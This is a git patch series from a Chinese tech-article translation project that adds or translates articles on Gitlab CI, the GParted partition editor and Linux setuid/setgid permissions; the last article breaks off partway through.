+[51]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t2.jpg +[52]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t2.jpg +[53]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg +[54]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg +[55]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg +[56]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg +[57]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t4.jpg +[58]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t4.jpg +[59]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg +[60]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg +[61]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg +[62]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg +[63]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop +[64]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg +[65]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg +[66]:http://deliveryimages.acm.org/10.1145/3130000/3126905/ut1.jpg +[67]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg +[68]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg +[69]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg +[70]:http://deliveryimages.acm.org/10.1145/3130000/3126905/ut2.jpg +[71]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg +[72]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg +[73]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg +[74]:http://deliveryimages.acm.org/10.1145/3130000/3126905/ut3.jpg +[75]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg +[76]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg +[77]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg +[78]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg +[79]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg +[80]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg +[81]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg +[82]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg +[83]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg +[84]:http://deliveryimages.acm.org/10.1145/3130000/3126905/ut4.jpg +[85]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg +[86]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg +[87]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg +[88]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg +[89]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop +[90]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop +[91]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop +[92]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop +[93]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop + + From 3ba62c94fbaa90c158da1ae4bf3430b2fd39f78a Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 15:12:26 +0800 Subject: [PATCH 0850/1627] translate done: 20171128 A generic introduction to Gitlab CI.md --- ...128 A generic introduction to Gitlab CI.md | 130 ------------------ ...128 A generic introduction to Gitlab CI.md | 129 +++++++++++++++++ 2 files changed, 129 insertions(+), 130 deletions(-) delete mode 100644 sources/tech/20171128 A generic introduction to Gitlab CI.md create mode 100644 translated/tech/20171128 A generic introduction to Gitlab CI.md diff --git a/sources/tech/20171128 A generic introduction to Gitlab CI.md b/sources/tech/20171128 A generic introduction to Gitlab CI.md deleted file mode 100644 index 1c1e985232..0000000000 --- a/sources/tech/20171128 A generic introduction to Gitlab CI.md +++ /dev/null @@ -1,130 +0,0 @@ -translating by lujun9972 -A generic introduction to Gitlab CI -====== -At [fleetster][1] we have our own instance of [Gitlab][2] and we rely a lot on [Gitlab CI][3]. Also our designers and QA guys use (and love) it, thanks to its advanced features. - -Gitlab CI is a very powerful system of Continuous Integration, with a lot of different features, and with every new releases, new features land. It has a very rich technical documentation, but it lacks a generic introduction for whom want to use it in an already existing setup. A designer or a tester doesn't need to know how to autoscale it with Kubernetes or the difference between an `image` or a `service`. - -But still, he needs to know what is a **pipeline** , and how to see a branch deployed to an **environment**. In this article therefore I will try to cover as many features as possible, highlighting how the end users can enjoy them; in the last months I explained such features to some members of our team, also developers: not everyone knows what Continuous Integration is or has used Gitlab CI in a previous job. - -If you want to know why Continuous Integration is important I suggest to read [this article][4], while for finding the reasons for using Gitlab CI specifically, I leave the job to [Gitlab.com][3] itself. - -### Introduction - -Every time a developer changes some code he saves his changes in a **commit**. He can then push that commit to Gitlab, so other developers can review the code. - -Gitlab will also start some work on that commit, if the Gitlab CI has been configured. This work is executed by a **runner**. A runner is basically a server (it can be a lot of different things, also your PC, but we can simplify it as a server) that executes instructions listed in the `.gitlab-ci.yml` file, and reports the result back to Gitlab itself, which will show it in his graphical interface. - -When a developer has finished implementing a new feature or a bugfix (activity that usual requires multiple commits), can open a **merge request** , where other member of the team can comment on the code and on the implementation. - -As we will see, also designers and testers can (and really should!) join this process, giving feedbacks and suggesting improvements, especially thanks to two features of Gitlab CI: **environments** and **artifacts**. - -### Pipelines - -Every commit that is pushed to Gitlab generates a **pipeline** attached to that commit. If multiple commits are pushed together the pipeline will be created only for the last of them. A pipeline is a collection of **jobs** split in different **stages**. - -All the jobs in the same stage run in concurrency (if there are enough runners) and the next stage begins only if all the jobs from the previous stage have finished with success. - -As soon as a job fails, the entire pipeline fails. There is an exception for this, as we will see below: if a job is marked as manual, then a failure will not make the pipeline fails. - -The stages are just a logic division between batches of jobs, where doesn't make sense to execute next jobs if the previous failed. We can have a `build` stage, where all the jobs to build the application are executed, and a `deploy` stage, where the build application is deployed. Doesn't make much sense to deploy something that failed to build, does it? - -Every job shouldn't have any dependency with any other job in the same stage, while they can expect results by jobs from a previous stage. - -Let's see how Gitlab shows information about stages and stages' status. - -![pipeline-overview][5] - -![pipeline-status][6] - -### Jobs - -A job is a collection of instructions that a runner has to execute. You can see in real time what's the output of the job, so developers can understand why a job fails. - -A job can be automatic, so it starts automatically when a commit is pushed, or manual. A manual job has to be triggered by someone manually. Can be useful, for example, to automatize a deploy, but still to deploy only when someone manually approves it. There is a way to limit who can run a job, so only trustworthy people can deploy, to continue the example before. - -A job can also build **artifacts** that users can download, like it creates an APK you can download and test on your device; in this way both designers and testers can download an application and test it without having to ask for help to developers. - -Other than creating artifacts, a job can deploy an **environment** , usually reachable by an URL, where users can test the commit. - -Job status are the same as stages status: indeed stages inherit theirs status from the jobs. - -![running-job][7] - -### Artifacts - -As we said, a job can create an artifact that users can download to test. It can be anything, like an application for Windows, an image generated by a PC, or an APK for Android. - -So you are a designer, and the merge request has been assigned to you: you need to validate the implementation of the new design! - -But how to do that? - -You need to open the merge request, and download the artifact, as shown in the figure. - -Every pipeline collects all the artifacts from all the jobs, and every job can have multiple artifacts. When you click on the download button, it will appear a dropdown where you can select which artifact you want. After the review, you can leave a comment on the MR. - -You can always download the artifacts also from pipelines that do not have a merge request open ;-) - -I am focusing on merge request because usually is where testers, designer, and shareholder in general enter the workflow. - -But merge requests are not linked to pipelines: while they integrate nice one in the other, they do not have any relation. - -![download-artifacts][8] - -### Environments - -In a similar way, a job can deploy something to an external server, so you can reach it through the merge request itself. - -As you can see the environment has a name and a link. Just clicking the link you to go to a deployed version of your application (of course, if your team has setup it correctly). - -You can click also on the name of the environment, because Gitlab has also other cool features for environments, like [monitoring][9]. - -![environment][10] - -### Conclusion - -This was a small introduction to some of the features of Gitlab CI: it is very powerful, and using it in the right way allows all the team to use just one tool to go from planning to deploying. A lot of new features are introduced every month, so keep an eye on the [Gitlab blog][11]. - -For setting it up, or for more advanced features, take a look to the [documentation][12]. - -In fleetster we use it not only for running tests, but also for having automatic versioning of the software and automatic deploys to testing environments. We have automatized other jobs as well (building apps and publish them on the Play Store and so on). - -Speaking of which, **do you want to work in a young and dynamically office with me and a lot of other amazing guys?** Take a look to the [open positions][13] at fleetster! - -Kudos to the Gitlab team (and others guys who help in their free time) for their awesome work! - -If you have any question or feedback about this blog post, please drop me an email at [riccardo@rpadovani.com][14] or [tweet me][15] :-) Feel free to suggest me to add something, or to rephrase paragraphs in a clearer way (English is not my mother tongue). - -Bye for now, -R. - -P.S: if you have found this article helpful and you'd like we write others, do you mind to help us reaching the [Ballmer's peak][16] and [buy me][17] a beer? - --------------------------------------------------------------------------------- - -via: https://rpadovani.com/introduction-gitlab-ci - -作者:[Riccardo][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://rpadovani.com -[1]:https://www.fleetster.net -[2]:https://gitlab.com/ -[3]:https://about.gitlab.com/gitlab-ci/ -[4]:https://about.gitlab.com/2015/02/03/7-reasons-why-you-should-be-using-ci/ -[5]:https://img.rpadovani.com/posts/pipeline-overview.png -[6]:https://img.rpadovani.com/posts/pipeline-status.png -[7]:https://img.rpadovani.com/posts/running-job.png -[8]:https://img.rpadovani.com/posts/download-artifacts.png -[9]:https://gitlab.com/help/ci/environments.md -[10]:https://img.rpadovani.com/posts/environment.png -[11]:https://about.gitlab.com/ -[12]:https://docs.gitlab.com/ee/ci/README.html -[13]:https://www.fleetster.net/fleetster-team.html -[14]:mailto:riccardo@rpadovani.com -[15]:https://twitter.com/rpadovani93 -[16]:https://www.xkcd.com/323/ -[17]:https://rpadovani.com/donations diff --git a/translated/tech/20171128 A generic introduction to Gitlab CI.md b/translated/tech/20171128 A generic introduction to Gitlab CI.md new file mode 100644 index 0000000000..41dcc5d359 --- /dev/null +++ b/translated/tech/20171128 A generic introduction to Gitlab CI.md @@ -0,0 +1,129 @@ +Gitlab CI 漫谈 +====== +我们在 [fleetster][1] 中搭建了自己的 [Gitlab][2] 实例,而且我们大量使用了 [Gitlab CI][3]。而且我们的设计师和 QA 也都在用它,也很喜欢用它,它的那些高级功能特别棒。 + +Gitlab CI 是一个功能非常强大的持续集成系统,有很多不同的功能,而且每次发布都会增加新的功能。它的技术文档也很丰富,但是它缺乏一个面向使用已经配置好的 Gitlab 用户的一般性的介绍。一个设计师或者测试人员是无需知道如何通过 Kubernetes 来实现自动伸缩,也无需知道`镜像`和`服务`之间的不同的。 + +但是,他仍然需要知道什么是`管道`,如何查看部署到一个`环境`中的分支。因此,在本文中,我会尽可能覆盖更多的功能,关注最终用户应该如何使用 Gitlab; 在过去的几个月里,我向我们团队中的某些人包括开发者讲解了这些功能:不是所有人都知道持续集成是个什么东西,也不是所有人都用过 Gitlab CI。 + +如果你想了解为什么持续集成那么重要,我建议阅读一下 [这篇文章 ][4],至于为什么要选择 Gitlab CI 呢,你可以去看看 [Gitlab.com][3] 上的说明。 + +### 简介 + +开发者保存更改代码的动作叫做一次`提交`。然后他可以将这次提交推送到 Gitlab 上,这样可以其他开发者就可以复查这些代码了。 + +Gitlab CI 配置好后,Gitlab 也能对这个提交做出一些处理。该处理的工作由一个 `runner` 来执行。所谓 runner 一本上就是一台服务器(也可以是其他的东西,比如你的 PC 机,但我们只是简单的把它看成是一台服务器)。这台服务器执行 `.gitlab-ci.yml` 文件中指令并将执行结果返回给 Gitlab 本身,然后在 Gitlab 的图形化界面上显示出来。 + +开发者完成一项新功能的开发或完成一个 bug 的修复后(这些动作通常包含了多次的提交),就可以发起一个 `合并请求`,团队其他成员则可以在这个合并请求中对代码和实现进行评论。 + +我们随后会看到,由于 Gitlab CI 提供的两大特性,`environments` 与 `artifacts`,使得设计者和测试人员也能(而且真的需要!)参与到这个过程中来,提供反馈以及改进意见。 + +### 管道 (Pipelines) + +每个推送到 Gitlab 的提交都会产生一个与该提交关联的`管道`。若一次推送包含了多个提交,则管道与最后那个提交相关联。一个管道就是一个分`阶段`的`作业`的集合。 + +同一阶段的所有作业会并发执行(在有足够 runner 的前提下),而下一阶段则只会在上一阶段所有作业都运行并返回成功后才会开始。 + +只要有一个作业失败了,整个管道就失败了。不过我们后面会看到,这其中有一个例外:若某个作业被标注成了手工运行,那么即使失败了也不会让整个管道失败。 + +阶段则只是对作业批量集合间的一个逻辑上的划分,若前一个任务集合执行失败了,则后一个执行也没什么意义了。比如我们可能有一个`构建`阶段和一个`部署`阶段,在这`构建`阶段运行所有用于构建应用的作业,而在`部署`阶段,会部署构建出来的应用程序。而部署一个构建失败的东西是没有什么意义的,不是吗? + +同一阶段的作业之间不能有依赖关系,但他们可以依赖于前一阶段的作业运行结果。 + +让我们来看一下 Gitlab 是如何展示阶段与阶段状态的相关信息的。 + +![pipeline-overview][5] + +![pipeline-status][6] + +### 作业 + +作业就是 runner 执行的指令集合。你可以实时地看到作业的输出结果,这样开发者就能知道作业为什么失败了。 + +作业可以是自动执行的,也就是当推送提交后自动开始执行,也可以手工执行。手工作业必须由某个人手工触发。手工作业也有其独特的作用,比如,实现自动化部署,但只有在有人手工授权的情况下才能开始部署。这是限制哪些人可以运行作业的一种方式,这样只有信赖的人才能进行部署,to continue the example before。 + +作业也可以建构出 `制品 (artifacts)` 来以供用户下载,比如可以构建出一个 APK 让你来下载,然后在你的设备中进行测试; 通过这种方式,设计者和测试人员都可以下载应用并进行测试,而无需开发人员的帮助。 + +除了生成制品外,作业也可以部署`环境`,通常这个环境可以通过 URL 访问,让用户来测试对应的提交。 + +做作业状态与阶段状态是一样的:实际上,阶段的状态就是继承自作业的。 + +![running-job][7] + +### 制品 (Artifacts) + +如前所述,作业能够生成制品供用户下载来测试。这个制品可以是任何东西,比如 windows 上的应用程序,PC 生成的图片,甚至 Android 上的 APK。 + +那么,假设你是个设计师,被分配了一个合并请求:你需要验证新设计的实现! + +要改怎么做呢? + +你需要打开该合并请求,下载制品,如图所示。 + +每个管道从所有作业中搜集所有的制品,而且一个作业中可以有多个制品。当你点击下载按钮时,会有一个下拉框让你选择下载哪个制品。检查之后你就可以评论这个合并请求了。 + +你也可以从没有合并请求的管道中下载制品 ;-) + +我之所以关注合并请求是因为通常这正是测试人员,设计师和股东开始工作的地方。 + +但是这并不意味着合并请求和管道就是绑死在一起的:虽然他们结合的很好,但两者之间并没有什么关系。 + +![download-artifacts][8] + +### 环境 + +类似的,作业可以将某些东西部署到外部服务器上去,似的可以通过合并请求本身访问这些内容。 + +如你所见,环境有一个名字和一个链接。只需点击链接你就能够转至应用的部署版本上去了(当前,前提是配置是正确的)。 + +Gitlab 还有其他一些很酷的环境相关的特性,比如 [监控 ][9],你可以通过点击环境的名字来查看。 + +![environment][10] + +### 总结 + +这是对 Gitlab CI 中某些功能的一个简单介绍:它非常强大,使用得当的话,可以让整个团队使用一个工具完成从计划到部署的工具。由于每个月都会推出很多新功能,因此请时刻关注 [Gitlab 博客 ][11]。 + +若想知道如何对它进行设置或想了解它的高级功能,请参阅它的[文档 ][12]。 + +在 fleetster 中,我们不仅用它来跑测试,而且用它来自动生成各种版本的软件,并自动发布到测试环境中去。我们也自动化了其他工作(构建应用并将之发布到 Play Store 中等其他工作)。 + +说起来,**你是否想和我以及其他很多超棒的人一起在一个年轻而又富有活力的办公室中工作呢?** 看看 fleetster 的这些[开放职位 ][13] 吧! + +赞美 Gitlab 团队 (和其他在空闲时间提供帮助的人),他们的工作太棒了! + +若对本文有任何问题或回馈,请给我发邮件:[riccardo@rpadovani.com][14] 或者[发推给我 ][15]:-) 你可以建议我增加内容,或者以更清晰的方式重写内容(英文不是我的母语)。 + +那么,再见吧, +R。 + +P.S:如果你觉得本文有用,而且希望我们写出其他文章的话,请问您是否愿意帮我[买被啤酒给我 ][17] 让我进入 [鲍尔默峰值 ][16]? + +-------------------------------------------------------------------------------- + +via: https://rpadovani.com/introduction-gitlab-ci + +作者:[Riccardo][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://rpadovani.com +[1]:https://www.fleetster.net +[2]:https://gitlab.com/ +[3]:https://about.gitlab.com/gitlab-ci/ +[4]:https://about.gitlab.com/2015/02/03/7-reasons-why-you-should-be-using-ci/ +[5]:https://img.rpadovani.com/posts/pipeline-overview.png +[6]:https://img.rpadovani.com/posts/pipeline-status.png +[7]:https://img.rpadovani.com/posts/running-job.png +[8]:https://img.rpadovani.com/posts/download-artifacts.png +[9]:https://gitlab.com/help/ci/environments.md +[10]:https://img.rpadovani.com/posts/environment.png +[11]:https://about.gitlab.com/ +[12]:https://docs.gitlab.com/ee/ci/README.html +[13]:https://www.fleetster.net/fleetster-team.html +[14]:mailto:riccardo@rpadovani.com +[15]:https://twitter.com/rpadovani93 +[16]:https://www.xkcd.com/323/ +[17]:https://rpadovani.com/donations From d0d04610cca4110bdcb8b60a72be8862f2b1d63c Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 15:30:39 +0800 Subject: [PATCH 0851/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20GParted=20The?= =?UTF-8?q?=20Complete=20Partition=20Editor=20For=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...The Complete Partition Editor For Linux.md | 111 ++++++++++++++++++ 1 file changed, 111 insertions(+) create mode 100644 sources/tech/20171120 GParted The Complete Partition Editor For Linux.md diff --git a/sources/tech/20171120 GParted The Complete Partition Editor For Linux.md b/sources/tech/20171120 GParted The Complete Partition Editor For Linux.md new file mode 100644 index 0000000000..dac93eb39d --- /dev/null +++ b/sources/tech/20171120 GParted The Complete Partition Editor For Linux.md @@ -0,0 +1,111 @@ +![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/gparted-the-complete-partition-editor-for-linux_orig.jpg) +**Partition editing**is a task which not only requires carefulness but also a stable environment. Today GParted is one of the leading partition editing tools on Linux environment. + +**GParted**is not only easy but also remains powerful at the same time. Today I am going to list out the installation as well as basics to use GParted which will be helpful to newbies. + +### How to install GParted? + +​Downloading and installing gparted is not a much difficult task. Today GParted is available on almost all distros and can be easily installed from their specific software center. Just go to software center and search “GParted” or use command line package manager to install it. + + [![install gparted from software center](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-gparted-from-software-center_orig.jpg)][1] In case you don’t have a software center or GParted isn’t available on software center you can always grab it from its official website.[Download][2] + +#### The Basics + +​Using GParted isn’t difficult. When I opened it for the first time 3 years ago, sure I was confused for a moment but I was quickly able to use it. Launching GParted requires admin privileges so it requires your password for launching. This is normal. + + [![type password to provide for admin privileges](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/type-password-to-provide-for-admin-privileges_orig.png)][3] + +​Below is the screen that GParted will display when you launch it the first time i.e. all your partitions of the hard disk (It will differ PC to PC). + + [![gparted user interface in linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/gparted-user-interface-in-linux_orig.png)][4] + +​The screen presented is not only simple but also effective. You will see that from left to right it displays address of the partition, type of partition, the mount point ( “/” indicates root), Label of partition (In case you name your partitions like I do), total size of partition and capacity used and unused as well as flags (never ever touch a partition with a flag unless you know what you are doing). The key sign in front of file systems indicates that the partition is currently mounted means used by the system. Right-click and select “unmount” to unmount it. + +You can see that it displays all sorts of information that you need to know about a particular partition you want to mess with. The bar with filled and unfilled portion indicates your hard disk. Also a simple thing “dev/sda” goes for hard disk while “dev/sdb” goes for your removable drives mostly flash drives (differs). + +You can change working on drives by clicking on the box at top right corner saying “dev/sda”. The tweaks you want are available on different options at the menu bar. + + [![edit usb partition in gparted](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edit-usb-partition-in-gparted_orig.png)][5] + +​This is my flash drive which I switched using the top right corner box as I told above. See it now indicates different details. Also as my drive is based on different format the color of bar changed. This is a really helpful feature as it indicates that partition changes if color differs. Editing external drives is also same as editing internal. + +#### Tweaking The Partitions + +Tweaking partition requires your full attention as this is somewhat risky because if it's done wrong, you will destroy your data. Keeping this point in mind proceed. + +Select a partition you want to work on rather it is on hard drive or flash drive is non-relevant. If the partition is mounted, unmount it. After unmounting the editing options will become available. + + [![gparted menu bar](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/gparted-menu-bar_orig.png)][6] + +This options can be accessed by menu bar or right mouse button too. The first option is for creating a new partition, the second one to delete, third one to resize partition, the fourth one to copy, fifth to paste. The last options are important as the second last is to revert changes and the last one is to apply changes. + +GParted doesn’t make changes in real time but keeps track of changes done by you. So you can easily revert a change if it is caused by mistake. Lastly, you can apply it and save changes. + +​Now let’s come to editing part. + +Let us assume you want to create a new partition by deleting existing one. Select partition of your choice hit the delete key and it will be deleted. Now for creating a new partition select that first option on the menu bar that indicates “new”. + +You will get the following options. + + [![create new partition with gparted](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-new-partition-with-gparted_orig.png)][7] + +​Here you can easily resize the partition by either entering values manually or drag the bar. If you want to change alignment do it with align option. You can choose whether to keep partition primary or secondary by option “create as”. Name the partition in Label and choose the appropriate file system. In case you want to access this partition on other OS like windows better use “ + +[NTFS][8] + +” format. + +There are times when data partition table is hampered. GParted handles this thing well too. There is the option to create new data partition table under device option. Remember creating data partition will destroy present data. + + [![select table type in gparted](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-table-type-in-gparted_orig.jpg)][9] + +​But what to do when you already having a pen drive on which you want to do data rescue? Gparted helps here too. Reach data rescue option under device section from the menu bar. This option requires the installation of additional components that can be accessed from software center. + + [![scan disk partition in gparted](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/scan-disk-partition-in-gparted_orig.jpg)][10] + +​You can also align flags to certain partition by option “flags”. Remember not to mess with flags unless you know what you are doing. There are a lot of other tweaks too to explore and use. Do that but remember mess with something unless you know what you are doing. + +#### Applying Tweaks + + [![apply changes to disk in gparted partition editor](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/apply-changes-to-disk-in-gparted-partition-editor_orig.png)][11] + +​After you have done tweaking you need to apply them. This could be done by using apply option I mentioned above. It will give you a warning. Check out if everything is proper before applying and proceed the warning to apply tweaks and your changes are done. Enjoy!. + +#### Other Features + +​Gparted offers live environment image files to boot and repair partitions in case of something wrong that can be downloaded from the website. GParted also shows tweaks it can do on your system, partition information and many others. Remember options will be differently available as per system. + + [![file system support in gparted](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/file-system-support-in-gparted_orig.png)][12] + +### Conclusion + +​Here we reach the end of my long article. + +**GParted**is a really nice, powerful software that has great capabilities. There is also a nice community on _GParted_ that will surely help you in case you come across a bug or doubt in which we [LinuxAndUbuntu][13]are too included. The power of GParted will help you to do almost all partition related task but you should be careful about what you are doing. + +Remember to always check out in the last what you are applying and is it right or not. In case you run across a problem don’t hesitate to comment and ask as we are always willing to help you. + +-------------------------------------------------------------------------------- + +via: http://www.linuxandubuntu.com/home/gparted-the-complete-partition-editor-for-linux + +作者:[ ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxandubuntu.com +[1]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-gparted-from-software-center_orig.jpg +[2]:http://gparted.org/download.php +[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/type-password-to-provide-for-admin-privileges_orig.png +[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/gparted-user-interface-in-linux_orig.png +[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edit-usb-partition-in-gparted_orig.png +[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/gparted-menu-bar_orig.png +[7]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-new-partition-with-gparted_orig.png +[8]:http://www.linuxandubuntu.com/home/fdisk-command-to-manage-disk-partitions-in-linux +[9]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-table-type-in-gparted_orig.jpg +[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/scan-disk-partition-in-gparted_orig.jpg +[11]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/apply-changes-to-disk-in-gparted-partition-editor_orig.png +[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/file-system-support-in-gparted_orig.png +[13]:http://www.linuxandubuntu.com/ From a220a4354f7615084820b3d767ed0f84942ab514 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 15:31:45 +0800 Subject: [PATCH 0852/1627] add done: 20171120 GParted The Complete Partition Editor For Linux.md --- ...171120 GParted The Complete Partition Editor For Linux.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/sources/tech/20171120 GParted The Complete Partition Editor For Linux.md b/sources/tech/20171120 GParted The Complete Partition Editor For Linux.md index dac93eb39d..e6ab0e9c2c 100644 --- a/sources/tech/20171120 GParted The Complete Partition Editor For Linux.md +++ b/sources/tech/20171120 GParted The Complete Partition Editor For Linux.md @@ -1,3 +1,6 @@ +GParted The Complete Partition Editor For Linux +====== + ![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/gparted-the-complete-partition-editor-for-linux_orig.jpg) **Partition editing**is a task which not only requires carefulness but also a stable environment. Today GParted is one of the leading partition editing tools on Linux environment. @@ -89,7 +92,7 @@ Remember to always check out in the last what you are applying and is it right o via: http://www.linuxandubuntu.com/home/gparted-the-complete-partition-editor-for-linux -作者:[ ][a] +作者:[LinuxAndUbuntu][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) From 0dcf133dd4b26d450e8ee867fce511f6c25e8535 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 29 Dec 2017 16:11:12 +0800 Subject: [PATCH 0853/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20use?= =?UTF-8?q?=20special=20permissions:=20the=20setuid,=20setgid=20and=20stic?= =?UTF-8?q?ky=20bits?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ons- the setuid, setgid and sticky bits.md | 103 ++++++++++++++++++ 1 file changed, 103 insertions(+) create mode 100644 sources/tech/20171120 How to use special permissions- the setuid, setgid and sticky bits.md diff --git a/sources/tech/20171120 How to use special permissions- the setuid, setgid and sticky bits.md b/sources/tech/20171120 How to use special permissions- the setuid, setgid and sticky bits.md new file mode 100644 index 0000000000..ab38f8856a --- /dev/null +++ b/sources/tech/20171120 How to use special permissions- the setuid, setgid and sticky bits.md @@ -0,0 +1,103 @@ +How to use special permissions: the setuid, setgid and sticky bits +====== + +### Objective + +Getting to know how special permissions works, how to identify and set them. + +### Requirements + + * Knowledge of the standard unix/linux permissions system + +### Difficulty + +EASY + +### Conventions + + * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command + * **$** \- given command to be executed as a regular non-privileged user + + + +### Introduction + +Normally, on a unix-like operating system, the ownership of files and directories is based on the default `uid` (user-id) and `gid` (group-id) of the user who created them. The same thing happens when a process is launched: it runs with the effective user-id and group-id of the user who started it, and with the corresponding privileges. This behavior can be modified by using special permissions. + +### The setuid bit + +When the `setuid` bit is used, the behavior described above it's modified so that when an executable is launched, it does not run with the privileges of the user who launched it, but with that of the file owner instead. So, for example, if an executable has the `setuid` bit set on it, and it's owned by root, when launched by a normal user, it will run with root privileges. It should be clear why this represents a potential security risk, if not used correctly. + +An example of an executable with the setuid permission set is `passwd`, the utility we can use to change our login password. We can verify that by using the `ls` command: +``` + +ls -l /bin/passwd +-rwsr-xr-x. 1 root root 27768 Feb 11 2017 /bin/passwd + +``` + +How to identify the `setuid` bit? As you surely have noticed looking at the output of the command above, the `setuid` bit is represented by an `s` in place of the `x` of the executable bit. The `s` implies that the executable bit is set, otherwise you would see a capital `S`. This happens when the `setuid` or `setgid` bits are set, but the executable bit is not, showing the user an inconsistency: the `setuid` and `setgit` bits have no effect if the executable bit is not set. The setuid bit has no effect on directories. + +### The setgid bit + +Unlike the `setuid` bit, the `setgid` bit has effect on both files and directories. In the first case, the file which has the `setgid` bit set, when executed, instead of running with the privileges of the group of the user who started it, runs with those of the group which owns the file: in other words, the group ID of the process will be the same of that of the file. + +When used on a directory, instead, the `setgid` bit alters the standard behavior so that the group of the files created inside said directory, will not be that of the user who created them, but that of the parent directory itself. This is often used to ease the sharing of files (files will be modifiable by all the users that are part of said group). Just like the setuid, the setgid bit can easily be spotted (in this case on a test directory): +``` + +ls -ld test +drwxrwsr-x. 2 egdoc egdoc 